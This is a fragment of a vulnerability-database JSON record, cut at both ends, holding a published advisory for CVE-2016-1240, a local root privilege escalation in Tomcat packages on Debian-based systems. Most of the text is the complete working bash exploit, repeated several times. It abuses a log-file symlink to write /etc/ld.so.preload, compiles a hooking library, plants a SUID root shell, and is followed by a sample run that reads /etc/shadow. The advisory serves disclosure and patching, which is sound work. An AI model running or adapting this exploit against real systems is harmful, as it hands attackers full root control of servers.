\"$CATALINA_PID\" \"$CATALINA_BASE\"/logs/catalina.out\r\n\r\n-------[eof]------\r\n```\r\nLocal attackers who have gained access to the server in the context of the\r\ntomcat user (for example, through a vulnerability in a web application) would \r\nbe able to replace the log file with a symlink to an arbitrary system file \r\nand escalate their privileges to root once Tomcat init script (running as root)\r\nre-opens the catalina.out file after a service restart, reboot etc.\r\n\r\nAs attackers would already have a tomcat account at the time of exploitation,\r\nthey could also kill the tomcat processes to introduce the need for a restart.\r\n\r\n\r\nV. PROOF OF CONCEPT EXPLOIT\r\n-------------------------\r\n```\r\n------[ tomcat-rootprivesc-deb.sh ]------\r\n\r\n#!/bin/bash\r\n#\r\n# Tomcat 6/7/8 on Debian-based distros - Local Root Privilege Escalation Exploit\r\n#\r\n# CVE-2016-1240\r\n#\r\n# Discovered and coded by:\r\n#\r\n# Dawid Golunski\r\n# http://legalhackers.com\r\n#\r\n# This exploit targets Tomcat (versions 6, 7 and 8) packaging on \r\n# Debian-based distros including Debian, Ubuntu etc.\r\n# It allows attackers with a tomcat shell (e.g. obtained remotely through a \r\n# vulnerable java webapp, or locally via weak permissions on webapps in the \r\n# Tomcat webroot directories etc.) to escalate their privileges to root.\r\n#\r\n# Usage:\r\n# ./tomcat-rootprivesc-deb.sh path_to_catalina.out [-deferred]\r\n#\r\n# The exploit can used in two ways:\r\n#\r\n# -active (assumed by default) - which waits for a Tomcat restart in a loop and instantly\r\n# gains/executes a rootshell via ld.so.preload as soon as Tomcat service is restarted. \r\n# It also gives attacker a chance to execute: kill [tomcat-pid] command to force/speed up\r\n# a Tomcat restart (done manually by an admin, or potentially by some tomcat service watchdog etc.)\r\n#\r\n# -deferred (requires the -deferred switch on argv[2]) - this mode symlinks the logfile to \r\n# /etc/default/locale and exits. It removes the need for the exploit to run in a loop waiting. \r\n# Attackers can come back at a later time and check on the /etc/default/locale file. Upon a \r\n# Tomcat restart / server reboot, the file should be owned by tomcat user. The attackers can\r\n# then add arbitrary commands to the file which will be executed with root privileges by \r\n# the /etc/cron.daily/tomcatN logrotation cronjob (run daily around 6:25am on default \r\n# Ubuntu/Debian Tomcat installations).\r\n#\r\n# See full advisory for details at:\r\n# http://legalhackers.com/advisories/Tomcat-DebPkgs-Root-Privilege-Escalation-Exploit-CVE-2016-1240.html\r\n#\r\n# Disclaimer:\r\n# For testing purposes only. Do no harm.\r\n#\r\n\r\nBACKDOORSH=\"/bin/bash\"\r\nBACKDOORPATH=\"/tmp/tomcatrootsh\"\r\nPRIVESCLIB=\"/tmp/privesclib.so\"\r\nPRIVESCSRC=\"/tmp/privesclib.c\"\r\nSUIDBIN=\"/usr/bin/sudo\"\r\n\r\nfunction cleanexit {\r\n\t# Cleanup \r\n\techo -e \"\\n[+] Cleaning up...\"\r\n\trm -f $PRIVESCSRC\r\n\trm -f $PRIVESCLIB\r\n\trm -f $TOMCATLOG\r\n\ttouch $TOMCATLOG\r\n\tif [ -f /etc/ld.so.preload ]; then\r\n\t\techo -n > /etc/ld.so.preload 2>/dev/null\r\n\tfi\r\n\techo -e \"\\n[+] Job done. Exiting with code $1 \\n\"\r\n\texit $1\r\n}\r\n\r\nfunction ctrl_c() {\r\n echo -e \"\\n[+] Active exploitation aborted. Remember you can use -deferred switch for deferred exploitation.\"\r\n\tcleanexit 0\r\n}\r\n\r\n#intro \r\necho -e \"\\033[94m \\nTomcat 6/7/8 on Debian-based distros - Local Root Privilege Escalation Exploit\\nCVE-2016-1240\\n\"\r\necho -e \"Discovered and coded by: \\n\\nDawid Golunski \\nhttp://legalhackers.com \\033[0m\"\r\n\r\n# Args\r\nif [ $# -lt 1 ]; then\r\n\techo -e \"\\n[!] Exploit usage: \\n\\n$0 path_to_catalina.out [-deferred]\\n\"\r\n\texit 3\r\nfi\r\nif [ \"$2\" = \"-deferred\" ]; then\r\n\tmode=\"deferred\"\r\nelse\r\n\tmode=\"active\"\r\nfi\r\n\r\n# Priv check\r\necho -e \"\\n[+] Starting the exploit in [\\033[94m$mode\\033[0m] mode with the following privileges: \\n`id`\"\r\nid | grep -q tomcat\r\nif [ $? -ne 0 ]; then\r\n\techo -e \"\\n[!] You need to execute the exploit as tomcat user! Exiting.\\n\"\r\n\texit 3\r\nfi\r\n\r\n# Set target paths\r\nTOMCATLOG=\"$1\"\r\nif [ ! -f $TOMCATLOG ]; then\r\n\techo -e \"\\n[!] The specified Tomcat catalina.out log ($TOMCATLOG) doesn't exist. Try again.\\n\"\r\n\texit 3\r\nfi\r\necho -e \"\\n[+] Target Tomcat log file set to $TOMCATLOG\"\r\n\r\n# [ Deferred exploitation ]\r\n\r\n# Symlink the log file to /etc/default/locale file which gets executed daily on default\r\n# tomcat installations on Debian/Ubuntu by the /etc/cron.daily/tomcatN logrotation cronjob around 6:25am.\r\n# Attackers can freely add their commands to the /etc/default/locale script after Tomcat has been\r\n# restarted and file owner gets changed.\r\nif [ \"$mode\" = \"deferred\" ]; then\r\n\trm -f $TOMCATLOG && ln -s /etc/default/locale $TOMCATLOG\r\n\tif [ $? -ne 0 ]; then\r\n\t\techo -e \"\\n[!] Couldn't remove the $TOMCATLOG file or create a symlink.\"\r\n\t\tcleanexit 3\r\n\tfi\r\n\techo -e \"\\n[+] Symlink created at: \\n`ls -l $TOMCATLOG`\"\r\n\techo -e \"\\n[+] The current owner of the file is: \\n`ls -l /etc/default/locale`\"\r\n\techo -ne \"\\n[+] Keep an eye on the owner change on /etc/default/locale . After the Tomcat restart / system reboot\"\r\n\techo -ne \"\\n you'll be able to add arbitrary commands to the file which will get executed with root privileges\"\r\n\techo -ne \"\\n at ~6:25am by the /etc/cron.daily/tomcatN log rotation cron. See also -active mode if you can't wait ;)\\n\\n\"\r\n\texit 0\r\nfi\r\n\r\n# [ Active exploitation ]\r\n\r\ntrap ctrl_c INT\r\n# Compile privesc preload library\r\necho -e \"\\n[+] Compiling the privesc shared library ($PRIVESCSRC)\"\r\ncat <<_solibeof_>$PRIVESCSRC\r\n#define _GNU_SOURCE\r\n#include <stdio.h>\r\n#include <sys/stat.h>\r\n#include <unistd.h>\r\n#include <dlfcn.h>\r\nuid_t geteuid(void) {\r\n\tstatic uid_t (*old_geteuid)();\r\n\told_geteuid = dlsym(RTLD_NEXT, \"geteuid\");\r\n\tif ( old_geteuid() == 0 ) {\r\n\t\tchown(\"$BACKDOORPATH\", 0, 0);\r\n\t\tchmod(\"$BACKDOORPATH\", 04777);\r\n\t\tunlink(\"/etc/ld.so.preload\");\r\n\t}\r\n\treturn old_geteuid();\r\n}\r\n_solibeof_\r\ngcc -Wall -fPIC -shared -o $PRIVESCLIB $PRIVESCSRC -ldl\r\nif [ $? -ne 0 ]; then\r\n\techo -e \"\\n[!] Failed to compile the privesc lib $PRIVESCSRC.\"\r\n\tcleanexit 2;\r\nfi\r\n\r\n# Prepare backdoor shell\r\ncp $BACKDOORSH $BACKDOORPATH\r\necho -e \"\\n[+] Backdoor/low-priv shell installed at: \\n`ls -l $BACKDOORPATH`\"\r\n\r\n# Safety check\r\nif [ -f /etc/ld.so.preload ]; then\r\n\techo -e \"\\n[!] /etc/ld.so.preload already exists. Exiting for safety.\"\r\n\tcleanexit 2\r\nfi\r\n\r\n# Symlink the log file to ld.so.preload\r\nrm -f $TOMCATLOG && ln -s /etc/ld.so.preload $TOMCATLOG\r\nif [ $? -ne 0 ]; then\r\n\techo -e \"\\n[!] Couldn't remove the $TOMCATLOG file or create a symlink.\"\r\n\tcleanexit 3\r\nfi\r\necho -e \"\\n[+] Symlink created at: \\n`ls -l $TOMCATLOG`\"\r\n\r\n# Wait for Tomcat to re-open the logs\r\necho -ne \"\\n[+] Waiting for Tomcat to re-open the logs/Tomcat service restart...\"\r\necho -e \"\\nYou could speed things up by executing : kill [Tomcat-pid] (as tomcat user) if needed ;)\"\r\nwhile :; do \r\n\tsleep 0.1\r\n\tif [ -f /etc/ld.so.preload ]; then\r\n\t\techo $PRIVESCLIB > /etc/ld.so.preload\r\n\t\tbreak;\r\n\tfi\r\ndone\r\n\r\n# /etc/ld.so.preload file should be owned by tomcat user at this point\r\n# Inject the privesc.so shared library to escalate privileges\r\necho $PRIVESCLIB > /etc/ld.so.preload\r\necho -e \"\\n[+] Tomcat restarted. The /etc/ld.so.preload file got created with tomcat privileges: \\n`ls -l /etc/ld.so.preload`\"\r\necho -e \"\\n[+] Adding $PRIVESCLIB shared lib to /etc/ld.so.preload\"\r\necho -e \"\\n[+] The /etc/ld.so.preload file now contains: \\n`cat /etc/ld.so.preload`\"\r\n\r\n# Escalating privileges via the SUID binary (e.g. /usr/bin/sudo)\r\necho -e \"\\n[+] Escalating privileges via the $SUIDBIN SUID binary to get root!\"\r\nsudo --help 2>/dev/null >/dev/null\r\n\r\n# Check for the rootshell\r\nls -l $BACKDOORPATH | grep rws | grep -q root\r\nif [ $? -eq 0 ]; then \r\n\techo -e \"\\n[+] Rootshell got assigned root SUID perms at: \\n`ls -l $BACKDOORPATH`\"\r\n\techo -e \"\\n\\033[94mPlease tell me you're seeing this too ;) \\033[0m\"\r\nelse\r\n\techo -e \"\\n[!] Failed to get root\"\r\n\tcleanexit 2\r\nfi\r\n\r\n# Execute the rootshell\r\necho -e \"\\n[+] Executing the rootshell $BACKDOORPATH now! \\n\"\r\n$BACKDOORPATH -p -c \"rm -f /etc/ld.so.preload; rm -f $PRIVESCLIB\"\r\n$BACKDOORPATH -p\r\n\r\n# Job done.\r\ncleanexit 0\r\n\r\n--------------[ EOF ]--------------------\r\n```\r\n\r\n\r\nExample exploit run:\r\n~~~~~~~~~~~~~~\r\n```\r\ntomcat7@ubuntu:/tmp$ id\r\nuid=110(tomcat7) gid=118(tomcat7) groups=118(tomcat7)\r\n\r\ntomcat7@ubuntu:/tmp$ lsb_release -a\r\nNo LSB modules are available.\r\nDistributor ID:\tUbuntu\r\nDescription:\tUbuntu 16.04 LTS\r\nRelease:\t16.04\r\nCodename:\txenial\r\n\r\ntomcat7@ubuntu:/tmp$ dpkg -l | grep tomcat\r\nii libtomcat7-java 7.0.68-1ubuntu0.1 all Servlet and JSP engine -- core libraries\r\nii tomcat7 7.0.68-1ubuntu0.1 all Servlet and JSP engine\r\nii tomcat7-common 7.0.68-1ubuntu0.1 all Servlet and JSP engine -- common files\r\n\r\ntomcat7@ubuntu:/tmp$ ./tomcat-rootprivesc-deb.sh /var/log/tomcat7/catalina.out \r\n \r\nTomcat 6/7/8 on Debian-based distros - Local Root Privilege Escalation Exploit\r\nCVE-2016-1240\r\n\r\nDiscovered and coded by: \r\n\r\nDawid Golunski \r\nhttp://legalhackers.com \r\n\r\n[+] Starting the exploit in [active] mode with the following privileges: \r\nuid=110(tomcat7) gid=118(tomcat7) groups=118(tomcat7)\r\n\r\n[+] Target Tomcat log file set to /var/log/tomcat7/catalina.out\r\n\r\n[+] Compiling the privesc shared library (/tmp/privesclib.c)\r\n\r\n[+] Backdoor/low-priv shell installed at: \r\n-rwxr-xr-x 1 tomcat7 tomcat7 1037464 Sep 30 22:27 /tmp/tomcatrootsh\r\n\r\n[+] Symlink created at: \r\nlrwxrwxrwx 1 tomcat7 tomcat7 18 Sep 30 22:27 /var/log/tomcat7/catalina.out -> /etc/ld.so.preload\r\n\r\n[+] Waiting for Tomcat to re-open the logs/Tomcat service restart...\r\nYou could speed things up by executing : kill [Tomcat-pid] (as tomcat user) if needed ;)\r\n\r\n[+] Tomcat restarted. The /etc/ld.so.preload file got created with tomcat privileges: \r\n-rw-r--r-- 1 tomcat7 root 19 Sep 30 22:28 /etc/ld.so.preload\r\n\r\n[+] Adding /tmp/privesclib.so shared lib to /etc/ld.so.preload\r\n\r\n[+] The /etc/ld.so.preload file now contains: \r\n/tmp/privesclib.so\r\n\r\n[+] Escalating privileges via the /usr/bin/sudo SUID binary to get root!\r\n\r\n[+] Rootshell got assigned root SUID perms at: \r\n-rwsrwxrwx 1 root root 1037464 Sep 30 22:27 /tmp/tomcatrootsh\r\n\r\nPlease tell me you're seeing this too ;) \r\n\r\n[+] Executing the rootshell /tmp/tomcatrootsh now! \r\n\r\ntomcatrootsh-4.3# id\r\nuid=110(tomcat7) gid=118(tomcat7) euid=0(root) groups=118(tomcat7)\r\ntomcatrootsh-4.3# whoami\r\nroot\r\ntomcatrootsh-4.3# head -n3 /etc/shadow\r\nroot:$6$oaf[cut]:16912:0:99999:7:::\r\ndaemon:*:16912:0:99999:7:::\r\nbin:*:16912:0:99999:7:::\r\ntomcatrootsh-4.3# exit\r\nexit\r\n\r\n[+] Cleaning up...\r\n\r\n[+] Job done. Exiting with code 0 \r\n\r\n```\r\n\r\nVI. BUSINESS IMPACT\r\n-------------------------\r\n\r\nLocal attackers who have gained access to tomcat user account (for example \r\nremotely via a vulnerable web application, or locally via weak webroot perms),\r\ncould escalate their privileges to root and fully compromise the affected system.\r\n\r\n \r\nVII. SYSTEMS AFFECTED\r\n-------------------------\r\n\r\nThe following Debian package versions are affected:\r\n\r\nTomcat 8 <= 8.0.36-2\r\nTomcat 7 <= 7.0.70-2\r\nTomcat 6 <= 6.0.45+dfsg-1~deb8u1\r\n\r\nA more detailed lists of affected packages can be found at:\r\n\r\nDebian:\r\nhttps://security-tracker.debian.org/tracker/CVE-2016-1240\r\n\r\nUbuntu:\r\nhttp://www.ubuntu.com/usn/usn-3081-1/\r\n\r\nOther systmes that use Tomcat packages provided by Debian may also be affected.\r\n\r\n \r\nVIII. SOLUTION\r\n-------------------------\r\n\r\nDebian Security Team was contacted and has fixed affected upstream packages.\r\nUpdate to the latest tomcat packages provided by your distribution.\r\n \r\nIX. REFERENCES\r\n-------------------------\r\n\r\nhttp://legalhackers.com\r\n\r\nhttp://legalhackers.com/advisories/Tomcat-DebPkgs-Root-Privilege-Escalation-Exploit-CVE-2016-1240.html\r\n\r\nThe exploit's sourcecode\r\nhttp://legalhackers.com/exploits/tomcat-rootprivesc-deb.sh\r\n\r\nCVE-2016-1240\r\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1240\r\n\r\nUbuntu Security Notice USN-3081-1:\r\nhttp://www.ubuntu.com/usn/usn-3081-1/\r\n\r\nDebian Security Advisory DSA-3669-1 (tomcat7):\r\nhttps://lists.debian.org/debian-security-announce/2016/msg00249.html\r\nhttps://www.debian.org/security/2016/dsa-3669\r\n\r\nDebian Security Advisory DSA-3670-1 (tomcat8):\r\nhttps://www.debian.org/security/2016/dsa-3670\r\n\r\nhttps://security-tracker.debian.org/tracker/CVE-2016-1240\r\n\r\n\r\nX. CREDITS\r\n-------------------------\r\n\r\nThe vulnerability has been discovered by Dawid Golunski\r\ndawid (at) legalhackers (dot) com\r\nhttp://legalhackers.com\r\n \r\nXI. REVISION HISTORY\r\n-------------------------\r\n\r\n30.09.2016 - Advisory released\r\n \r\nXII. LEGAL NOTICES\r\n-------------------------\r\n\r\nThe information contained within this advisory is supplied \"as-is\" with\r\nno warranties or guarantees of fitness of use or otherwise. I accept no\r\nresponsibility for any damage caused by the use or misuse of this information.", "modified": "2016-10-04T00:00:00", "published": "2016-10-04T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-92455", "id": "SSV:92455", "type": "seebug", "title": "Apache Tomcat packaging on Debian-based distros - Local Root Privilege Escalation", "sourceData": "\n #!/bin/bash\r\n#\r\n# Tomcat 6/7/8 on Debian-based distros - Local Root Privilege Escalation Exploit\r\n#\r\n# CVE-2016-1240\r\n#\r\n# Discovered and coded by:\r\n#\r\n# Dawid Golunski\r\n# http://legalhackers.com\r\n#\r\n# This exploit targets Tomcat (versions 6, 7 and 8) packaging on \r\n# Debian-based distros including Debian, Ubuntu etc.\r\n# It allows attackers with a tomcat shell (e.g. obtained remotely through a \r\n# vulnerable java webapp, or locally via weak permissions on webapps in the \r\n# Tomcat webroot directories etc.) to escalate their privileges to root.\r\n#\r\n# Usage:\r\n# ./tomcat-rootprivesc-deb.sh path_to_catalina.out [-deferred]\r\n#\r\n# The exploit can used in two ways:\r\n#\r\n# -active (assumed by default) - which waits for a Tomcat restart in a loop and instantly\r\n# gains/executes a rootshell via ld.so.preload as soon as Tomcat service is restarted. \r\n# It also gives attacker a chance to execute: kill [tomcat-pid] command to force/speed up\r\n# a Tomcat restart (done manually by an admin, or potentially by some tomcat service watchdog etc.)\r\n#\r\n# -deferred (requires the -deferred switch on argv[2]) - this mode symlinks the logfile to \r\n# /etc/default/locale and exits. It removes the need for the exploit to run in a loop waiting. \r\n# Attackers can come back at a later time and check on the /etc/default/locale file. Upon a \r\n# Tomcat restart / server reboot, the file should be owned by tomcat user. The attackers can\r\n# then add arbitrary commands to the file which will be executed with root privileges by \r\n# the /etc/cron.daily/tomcatN logrotation cronjob (run daily around 6:25am on default \r\n# Ubuntu/Debian Tomcat installations).\r\n#\r\n# See full advisory for details at:\r\n# http://legalhackers.com/advisories/Tomcat-DebPkgs-Root-Privilege-Escalation-Exploit-CVE-2016-1240.html\r\n#\r\n# Disclaimer:\r\n# For testing purposes only. Do no harm.\r\n#\r\n\r\nBACKDOORSH=\"/bin/bash\"\r\nBACKDOORPATH=\"/tmp/tomcatrootsh\"\r\nPRIVESCLIB=\"/tmp/privesclib.so\"\r\nPRIVESCSRC=\"/tmp/privesclib.c\"\r\nSUIDBIN=\"/usr/bin/sudo\"\r\n\r\nfunction cleanexit {\r\n\t# Cleanup \r\n\techo -e \"\\n[+] Cleaning up...\"\r\n\trm -f $PRIVESCSRC\r\n\trm -f $PRIVESCLIB\r\n\trm -f $TOMCATLOG\r\n\ttouch $TOMCATLOG\r\n\tif [ -f /etc/ld.so.preload ]; then\r\n\t\techo -n > /etc/ld.so.preload 2>/dev/null\r\n\tfi\r\n\techo -e \"\\n[+] Job done. Exiting with code $1 \\n\"\r\n\texit $1\r\n}\r\n\r\nfunction ctrl_c() {\r\n echo -e \"\\n[+] Active exploitation aborted. Remember you can use -deferred switch for deferred exploitation.\"\r\n\tcleanexit 0\r\n}\r\n\r\n#intro \r\necho -e \"\\033[94m \\nTomcat 6/7/8 on Debian-based distros - Local Root Privilege Escalation Exploit\\nCVE-2016-1240\\n\"\r\necho -e \"Discovered and coded by: \\n\\nDawid Golunski \\nhttp://legalhackers.com \\033[0m\"\r\n\r\n# Args\r\nif [ $# -lt 1 ]; then\r\n\techo -e \"\\n[!] Exploit usage: \\n\\n$0 path_to_catalina.out [-deferred]\\n\"\r\n\texit 3\r\nfi\r\nif [ \"$2\" = \"-deferred\" ]; then\r\n\tmode=\"deferred\"\r\nelse\r\n\tmode=\"active\"\r\nfi\r\n\r\n# Priv check\r\necho -e \"\\n[+] Starting the exploit in [\\033[94m$mode\\033[0m] mode with the following privileges: \\n`id`\"\r\nid | grep -q tomcat\r\nif [ $? -ne 0 ]; then\r\n\techo -e \"\\n[!] You need to execute the exploit as tomcat user! Exiting.\\n\"\r\n\texit 3\r\nfi\r\n\r\n# Set target paths\r\nTOMCATLOG=\"$1\"\r\nif [ ! -f $TOMCATLOG ]; then\r\n\techo -e \"\\n[!] The specified Tomcat catalina.out log ($TOMCATLOG) doesn't exist. Try again.\\n\"\r\n\texit 3\r\nfi\r\necho -e \"\\n[+] Target Tomcat log file set to $TOMCATLOG\"\r\n\r\n# [ Deferred exploitation ]\r\n\r\n# Symlink the log file to /etc/default/locale file which gets executed daily on default\r\n# tomcat installations on Debian/Ubuntu by the /etc/cron.daily/tomcatN logrotation cronjob around 6:25am.\r\n# Attackers can freely add their commands to the /etc/default/locale script after Tomcat has been\r\n# restarted and file owner gets changed.\r\nif [ \"$mode\" = \"deferred\" ]; then\r\n\trm -f $TOMCATLOG && ln -s /etc/default/locale $TOMCATLOG\r\n\tif [ $? -ne 0 ]; then\r\n\t\techo -e \"\\n[!] Couldn't remove the $TOMCATLOG file or create a symlink.\"\r\n\t\tcleanexit 3\r\n\tfi\r\n\techo -e \"\\n[+] Symlink created at: \\n`ls -l $TOMCATLOG`\"\r\n\techo -e \"\\n[+] The current owner of the file is: \\n`ls -l /etc/default/locale`\"\r\n\techo -ne \"\\n[+] Keep an eye on the owner change on /etc/default/locale . After the Tomcat restart / system reboot\"\r\n\techo -ne \"\\n you'll be able to add arbitrary commands to the file which will get executed with root privileges\"\r\n\techo -ne \"\\n at ~6:25am by the /etc/cron.daily/tomcatN log rotation cron. See also -active mode if you can't wait ;)\\n\\n\"\r\n\texit 0\r\nfi\r\n\r\n# [ Active exploitation ]\r\n\r\ntrap ctrl_c INT\r\n# Compile privesc preload library\r\necho -e \"\\n[+] Compiling the privesc shared library ($PRIVESCSRC)\"\r\ncat <<_solibeof_>$PRIVESCSRC\r\n#define _GNU_SOURCE\r\n#include <stdio.h>\r\n#include <sys/stat.h>\r\n#include <unistd.h>\r\n#include <dlfcn.h>\r\nuid_t geteuid(void) {\r\n\tstatic uid_t (*old_geteuid)();\r\n\told_geteuid = dlsym(RTLD_NEXT, \"geteuid\");\r\n\tif ( old_geteuid() == 0 ) {\r\n\t\tchown(\"$BACKDOORPATH\", 0, 0);\r\n\t\tchmod(\"$BACKDOORPATH\", 04777);\r\n\t\tunlink(\"/etc/ld.so.preload\");\r\n\t}\r\n\treturn old_geteuid();\r\n}\r\n_solibeof_\r\ngcc -Wall -fPIC -shared -o $PRIVESCLIB $PRIVESCSRC -ldl\r\nif [ $? -ne 0 ]; then\r\n\techo -e \"\\n[!] Failed to compile the privesc lib $PRIVESCSRC.\"\r\n\tcleanexit 2;\r\nfi\r\n\r\n# Prepare backdoor shell\r\ncp $BACKDOORSH $BACKDOORPATH\r\necho -e \"\\n[+] Backdoor/low-priv shell installed at: \\n`ls -l $BACKDOORPATH`\"\r\n\r\n# Safety check\r\nif [ -f /etc/ld.so.preload ]; then\r\n\techo -e \"\\n[!] /etc/ld.so.preload already exists. Exiting for safety.\"\r\n\tcleanexit 2\r\nfi\r\n\r\n# Symlink the log file to ld.so.preload\r\nrm -f $TOMCATLOG && ln -s /etc/ld.so.preload $TOMCATLOG\r\nif [ $? -ne 0 ]; then\r\n\techo -e \"\\n[!] Couldn't remove the $TOMCATLOG file or create a symlink.\"\r\n\tcleanexit 3\r\nfi\r\necho -e \"\\n[+] Symlink created at: \\n`ls -l $TOMCATLOG`\"\r\n\r\n# Wait for Tomcat to re-open the logs\r\necho -ne \"\\n[+] Waiting for Tomcat to re-open the logs/Tomcat service restart...\"\r\necho -e \"\\nYou could speed things up by executing : kill [Tomcat-pid] (as tomcat user) if needed ;)\"\r\nwhile :; do \r\n\tsleep 0.1\r\n\tif [ -f /etc/ld.so.preload ]; then\r\n\t\techo $PRIVESCLIB > /etc/ld.so.preload\r\n\t\tbreak;\r\n\tfi\r\ndone\r\n\r\n# /etc/ld.so.preload file should be owned by tomcat user at this point\r\n# Inject the privesc.so shared library to escalate privileges\r\necho $PRIVESCLIB > /etc/ld.so.preload\r\necho -e \"\\n[+] Tomcat restarted. The /etc/ld.so.preload file got created with tomcat privileges: \\n`ls -l /etc/ld.so.preload`\"\r\necho -e \"\\n[+] Adding $PRIVESCLIB shared lib to /etc/ld.so.preload\"\r\necho -e \"\\n[+] The /etc/ld.so.preload file now contains: \\n`cat /etc/ld.so.preload`\"\r\n\r\n# Escalating privileges via the SUID binary (e.g. /usr/bin/sudo)\r\necho -e \"\\n[+] Escalating privileges via the $SUIDBIN SUID binary to get root!\"\r\nsudo --help 2>/dev/null >/dev/null\r\n\r\n# Check for the rootshell\r\nls -l $BACKDOORPATH | grep rws | grep -q root\r\nif [ $? -eq 0 ]; then \r\n\techo -e \"\\n[+] Rootshell got assigned root SUID perms at: \\n`ls -l $BACKDOORPATH`\"\r\n\techo -e \"\\n\\033[94mPlease tell me you're seeing this too ;) \\033[0m\"\r\nelse\r\n\techo -e \"\\n[!] Failed to get root\"\r\n\tcleanexit 2\r\nfi\r\n\r\n# Execute the rootshell\r\necho -e \"\\n[+] Executing the rootshell $BACKDOORPATH now! \\n\"\r\n$BACKDOORPATH -p -c \"rm -f /etc/ld.so.preload; rm -f $PRIVESCLIB\"\r\n$BACKDOORPATH -p\r\n\r\n# Job done.\r\ncleanexit 0\n ", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-92455"}], "exploitdb": [{"lastseen": "2016-10-04T09:29:12", "bulletinFamily": "exploit", "description": "Apache Tomcat 8/7/6 (Debian-Based Distros) - Privilege Escalation. CVE-2016-1240. Local exploit for Linux platform", "modified": "2016-10-03T00:00:00", "published": "2016-10-03T00:00:00", "id": "EDB-ID:40450", "href": "https://www.exploit-db.com/exploits/40450/", "type": "exploitdb", "title": "Apache Tomcat 8/7/6 (Debian-Based Distros) - Privilege Escalation", "sourceData": "=============================================\r\n- Discovered by: Dawid Golunski\r\n- http://legalhackers.com\r\n- dawid (at) legalhackers.com\r\n\r\n- CVE-2016-1240\r\n- Release date: 30.09.2016\r\n- Revision: 1\r\n- Severity: High\r\n=============================================\r\n\r\n\r\nI. VULNERABILITY\r\n-------------------------\r\n\r\nApache Tomcat packaging on Debian-based distros - Local Root Privilege Escalation\r\n\r\nAffected debian packages:\r\n\r\nTomcat 8 <= 8.0.36-2 \r\nTomcat 7 <= 7.0.70-2 \r\nTomcat 6 <= 6.0.45+dfsg-1~deb8u1\r\n\r\nUbuntu systems are also affected. See section VII. for details.\r\nOther systems using the affected debian packages may also be affected.\r\n\r\n\r\nII. BACKGROUND\r\n-------------------------\r\n\r\n\"The Apache Tomcat\u0102\u0082\u00c2\u017d software is an open source implementation of the \r\nJava Servlet, JavaServer Pages, Java Expression Language and Java WebSocket \r\ntechnologies. The Java Servlet, JavaServer Pages, Java Expression Language \r\nand Java WebSocket specifications are developed under the Java Community \r\nProcess.\r\n\r\nThe Apache Tomcat software is developed in an open and participatory \r\nenvironment and released under the Apache License version 2. \r\nThe Apache Tomcat project is intended to be a collaboration of the \r\nbest-of-breed developers from around the world.\r\n\r\nApache Tomcat software powers numerous large-scale, mission-critical web \r\napplications across a diverse range of industries and organizations. \r\nSome of these users and their stories are listed on the PoweredBy wiki page.\r\n\"\r\n\r\nhttp://tomcat.apache.org/\r\n\r\n\r\nIII. INTRODUCTION\r\n-------------------------\r\n\r\nTomcat (6, 7, 8) packages provided by default repositories on Debian-based \r\ndistributions (including Debian, Ubuntu etc.) provide a vulnerable\r\ntomcat init script that allows local attackers who have already gained access \r\nto the tomcat account (for example, by exploiting an RCE vulnerability\r\nin a java web application hosted on Tomcat, uploading a webshell etc.) to\r\nescalate their privileges from tomcat user to root and fully compromise the \r\ntarget system.\r\n\r\nIV. DESCRIPTION\r\n-------------------------\r\n\r\nThe vulnerability is located in the tomcat init script provided by affected\r\npackages, normally installed at /etc/init.d/tomcatN. \r\n\r\nThe script for tomcat7 contains the following lines:\r\n\r\n-----[tomcat7]----\r\n\r\n# Run the catalina.sh script as a daemon\r\nset +e\r\ntouch \"$CATALINA_PID\" \"$CATALINA_BASE\"/logs/catalina.out\r\nchown $TOMCAT7_USER \"$CATALINA_PID\" \"$CATALINA_BASE\"/logs/catalina.out\r\n\r\n-------[eof]------\r\n\r\nLocal attackers who have gained access to the server in the context of the\r\ntomcat user (for example, through a vulnerability in a web application) would \r\nbe able to replace the log file with a symlink to an arbitrary system file \r\nand escalate their privileges to root once Tomcat init script (running as root)\r\nre-opens the catalina.out file after a service restart, reboot etc.\r\n\r\nAs attackers would already have a tomcat account at the time of exploitation,\r\nthey could also kill the tomcat processes to introduce the need for a restart.\r\n\r\n\r\nV. PROOF OF CONCEPT EXPLOIT\r\n-------------------------\r\n\r\n------[ tomcat-rootprivesc-deb.sh ]------\r\n\r\n#!/bin/bash\r\n#\r\n# Tomcat 6/7/8 on Debian-based distros - Local Root Privilege Escalation Exploit\r\n#\r\n# CVE-2016-1240\r\n#\r\n# Discovered and coded by:\r\n#\r\n# Dawid Golunski\r\n# http://legalhackers.com\r\n#\r\n# This exploit targets Tomcat (versions 6, 7 and 8) packaging on \r\n# Debian-based distros including Debian, Ubuntu etc.\r\n# It allows attackers with a tomcat shell (e.g. obtained remotely through a \r\n# vulnerable java webapp, or locally via weak permissions on webapps in the \r\n# Tomcat webroot directories etc.) to escalate their privileges to root.\r\n#\r\n# Usage:\r\n# ./tomcat-rootprivesc-deb.sh path_to_catalina.out [-deferred]\r\n#\r\n# The exploit can used in two ways:\r\n#\r\n# -active (assumed by default) - which waits for a Tomcat restart in a loop and instantly\r\n# gains/executes a rootshell via ld.so.preload as soon as Tomcat service is restarted. \r\n# It also gives attacker a chance to execute: kill [tomcat-pid] command to force/speed up\r\n# a Tomcat restart (done manually by an admin, or potentially by some tomcat service watchdog etc.)\r\n#\r\n# -deferred (requires the -deferred switch on argv[2]) - this mode symlinks the logfile to \r\n# /etc/default/locale and exits. It removes the need for the exploit to run in a loop waiting. \r\n# Attackers can come back at a later time and check on the /etc/default/locale file. Upon a \r\n# Tomcat restart / server reboot, the file should be owned by tomcat user. The attackers can\r\n# then add arbitrary commands to the file which will be executed with root privileges by \r\n# the /etc/cron.daily/tomcatN logrotation cronjob (run daily around 6:25am on default \r\n# Ubuntu/Debian Tomcat installations).\r\n#\r\n# See full advisory for details at:\r\n# http://legalhackers.com/advisories/Tomcat-DebPkgs-Root-Privilege-Escalation-Exploit-CVE-2016-1240.html\r\n#\r\n# Disclaimer:\r\n# For testing purposes only. Do no harm.\r\n#\r\n\r\nBACKDOORSH=\"/bin/bash\"\r\nBACKDOORPATH=\"/tmp/tomcatrootsh\"\r\nPRIVESCLIB=\"/tmp/privesclib.so\"\r\nPRIVESCSRC=\"/tmp/privesclib.c\"\r\nSUIDBIN=\"/usr/bin/sudo\"\r\n\r\nfunction cleanexit {\r\n\t# Cleanup \r\n\techo -e \"\\n[+] 